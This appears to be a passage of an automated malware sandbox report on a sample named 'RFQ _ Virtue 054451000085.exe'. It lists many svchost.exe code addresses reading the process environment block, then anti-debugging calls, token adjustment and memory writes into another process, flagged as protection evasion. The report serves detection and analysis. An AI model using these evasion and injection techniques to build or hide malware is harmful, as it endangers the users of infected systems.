                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A38550 mov eax, dword ptr fs:[00000030h]10_2_03A38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A38550 mov eax, dword ptr fs:[00000030h]10_2_03A38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A364AB mov eax, dword ptr fs:[00000030h]10_2_03A364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A644B0 mov ecx, dword ptr fs:[00000030h]10_2_03A644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]10_2_03ABA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A304E5 mov ecx, dword ptr fs:[00000030h]10_2_03A304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2E420 mov eax, dword ptr fs:[00000030h]10_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2E420 mov eax, dword ptr fs:[00000030h]10_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2E420 mov eax, dword ptr fs:[00000030h]10_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2C427 mov eax, dword ptr fs:[00000030h]10_2_03A2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]10_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]10_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]10_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]10_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]10_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]10_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]10_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6A430 mov eax, dword ptr fs:[00000030h]10_2_03A6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A68402 mov eax, dword ptr fs:[00000030h]10_2_03A68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A68402 mov eax, dword ptr fs:[00000030h]10_2_03A68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A68402 mov eax, dword ptr fs:[00000030h]10_2_03A68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABC460 mov ecx, dword ptr fs:[00000030h]10_2_03ABC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5A470 mov eax, dword ptr fs:[00000030h]10_2_03A5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5A470 mov eax, dword ptr fs:[00000030h]10_2_03A5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5A470 mov eax, dword ptr fs:[00000030h]10_2_03A5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]10_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]10_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]10_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]10_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]10_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]10_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]10_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]10_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2645D mov eax, dword ptr fs:[00000030h]10_2_03A2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5245A mov eax, dword ptr fs:[00000030h]10_2_03A5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40BBE mov eax, dword ptr fs:[00000030h]10_2_03A40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40BBE mov eax, dword ptr fs:[00000030h]10_2_03A40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A38BF0 mov eax, dword ptr fs:[00000030h]10_2_03A38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A38BF0 mov eax, dword ptr fs:[00000030h]10_2_03A38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A38BF0 mov eax, dword ptr fs:[00000030h]10_2_03A38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5EBFC mov eax, dword ptr fs:[00000030h]10_2_03A5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]10_2_03ABCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A50BCB mov eax, dword ptr fs:[00000030h]10_2_03A50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A50BCB mov eax, dword ptr fs:[00000030h]10_2_03A50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A50BCB mov eax, dword ptr fs:[00000030h]10_2_03A50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A30BCD mov eax, dword ptr fs:[00000030h]10_2_03A30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A30BCD mov eax, dword ptr fs:[00000030h]10_2_03A30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A30BCD mov eax, dword ptr fs:[00000030h]10_2_03A30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]10_2_03ADEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5EB20 mov eax, dword ptr fs:[00000030h]10_2_03A5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5EB20 mov eax, dword ptr fs:[00000030h]10_2_03A5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF8B28 mov eax, dword ptr fs:[00000030h]10_2_03AF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF8B28 mov eax, dword ptr fs:[00000030h]10_2_03AF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]10_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]10_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]10_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]10_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]10_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]10_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]10_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]10_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]10_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2CB7E mov eax, dword ptr fs:[00000030h]10_2_03A2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC6B40 mov eax, dword ptr fs:[00000030h]10_2_03AC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC6B40 mov eax, dword ptr fs:[00000030h]10_2_03AC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFAB40 mov eax, dword ptr fs:[00000030h]10_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD8B42 mov eax, dword ptr fs:[00000030h]10_2_03AD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A38AA0 mov eax, dword ptr fs:[00000030h]10_2_03A38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A38AA0 mov eax, dword ptr fs:[00000030h]10_2_03A38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A86AA4 mov eax, dword ptr fs:[00000030h]10_2_03A86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]10_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]10_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]10_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]10_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]10_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]10_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]10_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]10_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]10_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B04A80 mov eax, dword ptr fs:[00000030h]10_2_03B04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A68A90 mov edx, dword ptr fs:[00000030h]10_2_03A68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6AAEE mov eax, dword ptr fs:[00000030h]10_2_03A6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6AAEE mov eax, dword ptr fs:[00000030h]10_2_03A6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A86ACC mov eax, dword ptr fs:[00000030h]10_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A86ACC mov eax, dword ptr fs:[00000030h]10_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A86ACC mov eax, dword ptr fs:[00000030h]10_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A30AD0 mov eax, dword ptr fs:[00000030h]10_2_03A30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A64AD0 mov eax, dword ptr fs:[00000030h]10_2_03A64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A64AD0 mov eax, dword ptr fs:[00000030h]10_2_03A64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6CA24 mov eax, dword ptr fs:[00000030h]10_2_03A6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5EA2E mov eax, dword ptr fs:[00000030h]10_2_03A5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A54A35 mov eax, dword ptr fs:[00000030h]10_2_03A54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A54A35 mov eax, dword ptr fs:[00000030h]10_2_03A54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6CA38 mov eax, dword ptr fs:[00000030h]10_2_03A6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABCA11 mov eax, dword ptr fs:[00000030h]10_2_03ABCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6CA6F mov eax, dword ptr fs:[00000030h]10_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6CA6F mov eax, dword ptr fs:[00000030h]10_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6CA6F mov eax, dword ptr fs:[00000030h]10_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AACA72 mov eax, dword ptr fs:[00000030h]10_2_03AACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AACA72 mov eax, dword ptr fs:[00000030h]10_2_03AACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]10_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]10_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]10_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]10_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]10_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]10_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]10_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40A5B mov eax, dword ptr fs:[00000030h]10_2_03A40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40A5B mov eax, dword ptr fs:[00000030h]10_2_03A40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]10_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A309AD mov eax, dword ptr fs:[00000030h]10_2_03A309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A309AD mov eax, dword ptr fs:[00000030h]10_2_03A309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB89B3 mov esi, dword ptr fs:[00000030h]10_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB89B3 mov eax, dword ptr fs:[00000030h]10_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB89B3 mov eax, dword ptr fs:[00000030h]10_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]10_2_03ABE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A629F9 mov eax, dword ptr fs:[00000030h]10_2_03A629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A629F9 mov eax, dword ptr fs:[00000030h]10_2_03A629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC69C0 mov eax, dword ptr fs:[00000030h]10_2_03AC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]10_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]10_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]10_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]10_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]10_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]10_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A649D0 mov eax, dword ptr fs:[00000030h]10_2_03A649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]10_2_03AFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB892A mov eax, dword ptr fs:[00000030h]10_2_03AB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC892B mov eax, dword ptr fs:[00000030h]10_2_03AC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAE908 mov eax, dword ptr fs:[00000030h]10_2_03AAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAE908 mov eax, dword ptr fs:[00000030h]10_2_03AAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABC912 mov eax, dword ptr fs:[00000030h]10_2_03ABC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A28918 mov eax, dword ptr fs:[00000030h]10_2_03A28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A28918 mov eax, dword ptr fs:[00000030h]10_2_03A28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A56962 mov eax, dword ptr fs:[00000030h]10_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A56962 mov eax, dword ptr fs:[00000030h]10_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A56962 mov eax, dword ptr fs:[00000030h]10_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A7096E mov eax, dword ptr fs:[00000030h]10_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A7096E mov edx, dword ptr fs:[00000030h]10_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A7096E mov eax, dword ptr fs:[00000030h]10_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD4978 mov eax, dword ptr fs:[00000030h]10_2_03AD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD4978 mov eax, dword ptr fs:[00000030h]10_2_03AD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABC97C mov eax, dword ptr fs:[00000030h]10_2_03ABC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB0946 mov eax, dword ptr fs:[00000030h]10_2_03AB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A30887 mov eax, dword ptr fs:[00000030h]10_2_03A30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABC89D mov eax, dword ptr fs:[00000030h]10_2_03ABC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]10_2_03AFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]10_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]10_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]10_2_03A5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A52835 mov eax, dword ptr fs:[00000030h]10_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A52835 mov eax, dword ptr fs:[00000030h]10_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A52835 mov eax, dword ptr fs:[00000030h]10_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A52835 mov ecx, dword ptr fs:[00000030h]10_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A52835 mov eax, dword ptr fs:[00000030h]10_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A52835 mov eax, dword ptr fs:[00000030h]10_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6A830 mov eax, dword ptr fs:[00000030h]10_2_03A6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD483A mov eax, dword ptr fs:[00000030h]10_2_03AD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD483A mov eax, dword ptr fs:[00000030h]10_2_03AD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABC810 mov eax, dword ptr fs:[00000030h]10_2_03ABC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABE872 mov eax, dword ptr fs:[00000030h]10_2_03ABE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABE872 mov eax, dword ptr fs:[00000030h]10_2_03ABE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC6870 mov eax, dword ptr fs:[00000030h]10_2_03AC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC6870 mov eax, dword ptr fs:[00000030h]10_2_03AC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A42840 mov ecx, dword ptr fs:[00000030h]10_2_03A42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A60854 mov eax, dword ptr fs:[00000030h]10_2_03A60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A34859 mov eax, dword ptr fs:[00000030h]10_2_03A34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A34859 mov eax, dword ptr fs:[00000030h]10_2_03A34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6CF80 mov eax, dword ptr fs:[00000030h]10_2_03A6CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A62F98 mov eax, dword ptr fs:[00000030h]10_2_03A62F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A62F98 mov eax, dword ptr fs:[00000030h]10_2_03A62F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]10_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]10_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A70FF6 mov eax, dword ptr fs:[00000030h]10_2_03A70FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A70FF6 mov eax, dword ptr fs:[00000030h]10_2_03A70FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A70FF6 mov eax, dword ptr fs:[00000030h]10_2_03A70FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A70FF6 mov eax, dword ptr fs:[00000030h]10_2_03A70FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B04FE7 mov eax, dword ptr fs:[00000030h]10_2_03B04FE7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE6FF7 mov eax, dword ptr fs:[00000030h]10_2_03AE6FF7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A32FC8 mov eax, dword ptr fs:[00000030h]10_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A32FC8 mov eax, dword ptr fs:[00000030h]10_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A32FC8 mov eax, dword ptr fs:[00000030h]10_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A32FC8 mov eax, dword ptr fs:[00000030h]10_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]10_2_03A2EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]10_2_03A2EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]10_2_03A2EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5EF28 mov eax, dword ptr fs:[00000030h]10_2_03A5EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE6F00 mov eax, dword ptr fs:[00000030h]10_2_03AE6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A32F12 mov eax, dword ptr fs:[00000030h]10_2_03A32F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6CF1F mov eax, dword ptr fs:[00000030h]10_2_03A6CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5AF69 mov eax, dword ptr fs:[00000030h]10_2_03A5AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5AF69 mov eax, dword ptr fs:[00000030h]10_2_03A5AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD2F60 mov eax, dword ptr fs:[00000030h]10_2_03AD2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD2F60 mov eax, dword ptr fs:[00000030h]10_2_03AD2F60
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00BB1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BB1361
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00BB4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BB4C7B

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
